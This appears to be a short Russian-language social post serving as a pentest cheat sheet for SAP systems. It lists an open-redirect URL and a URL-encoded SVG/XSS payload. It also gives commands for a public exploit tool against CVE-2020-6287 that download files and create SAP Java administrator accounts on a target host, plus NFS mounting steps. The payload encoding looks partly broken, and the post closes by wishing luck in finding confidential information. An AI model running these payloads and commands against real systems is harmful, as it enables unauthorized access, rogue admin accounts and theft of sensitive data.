Бисмиллах
Для проведения Pentest вы должны развернуть систему SAP в своей сети
https: // host/sap/public/bc/icf/logoff? redirecturl = malicousurl
http: // host: port/startpage
http: // host: port/sap/public/info
http: // host: port/sap/public/info
Ищите/sapirexthelp https: // localhost/sapirexthelp
https: // host/sapirexthelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3D%26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%36%26%26%23%78%36%34%26%23%78%36%66%26%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26 %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3E.ASP
SAP Information System 1.0 Загрузка оболочки
CVE-2022-22536 (ICMAD SAP)
Уязвимость SAP Recon (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/sap_recon
Скачать zip -файл
python recon.py -h 172.16.30.8 -f /1111.zip
Создать пользователя SAP Java
python recon.py -h 172.16.30.8 -u
Создать пользователя администратора SAP Java
python recon.py -h 172.16.30.8 -a
SSLSCAN
nfs-ls nfs: // host/mount
mkdir mnt && mount -t nfs host:/mount ./mnt
Удачи в поисках конфиденциальной информации
Я ищу виртуальную машину или контейнер SAP для выполнения Pentest Simulation, если у вас есть информация, пожалуйста, пожалуйста, DM @linkedin)
Обмен заботясь
كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"